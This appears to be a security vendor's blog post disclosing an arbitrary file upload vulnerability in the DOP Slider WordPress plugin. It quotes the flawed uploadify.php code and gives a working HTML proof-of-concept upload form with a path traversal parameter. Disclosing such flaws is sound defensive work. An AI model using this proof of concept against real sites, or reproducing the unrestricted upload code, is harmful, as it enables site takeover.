25 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in DOP Slider

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/dop-slider/libraries/js/jquery.uploadify.min.js, from the plugin DOP Slider. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

The name of the file requested seemed to refer to Uploadify, which is a library that was associated with a number of arbitrary file upload vulnerabilities in plugins a several years ago, due to software using it not properly restricting the uploads. When we did search for any existing reports of a vulnerability of that type in the DOP Slider or some other vulnerability, all we came up with was a page with a list of plugin files apparently relate to Uploadify.

Looking at the code in the file listed for this plugin, /libraries/php/uploadify.php, the issue can be seen:

24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
if (!empty($_FILES)){
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $targetPath = $_GET['path'].'uploads';
 
    $ext = substr($_FILES['Filedata']['name'], strrpos($_FILES['Filedata']['name'], '.') + 1);
 
    $len = 64;
    $base='ABCDEFGHKLMNOPQRSTWXYZabcdefghjkmnpqrstwxyz123456789';
    $max=strlen($base)-1;
    $newName='';
    mt_srand((double)microtime()*1000000);
    while (strlen($newName)<$len+1){
        $newName.=$base{mt_rand(0,$max)};
    }
 
    $targetFile =  str_replace('//','/',$targetPath).'/'.$newName.'.'.$ext;
    move_uploaded_file($tempFile, $targetFile);

If a file has been included with a request to that file, then the code will generate a unique file name and place the file sent with the request in a directory that includes the word “uploads” and whatever additional value is included with the GET input “path”.

At the bottom of the file’s code the unique name of the saved file is echo’d:

75
echo $newName.'.'.$ext;

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/dop-slider/uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/dop-slider/libraries/php/uploadify.php?path=../../" method="POST" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Leave a Reply

Your email address will not be published. Required fields are marked *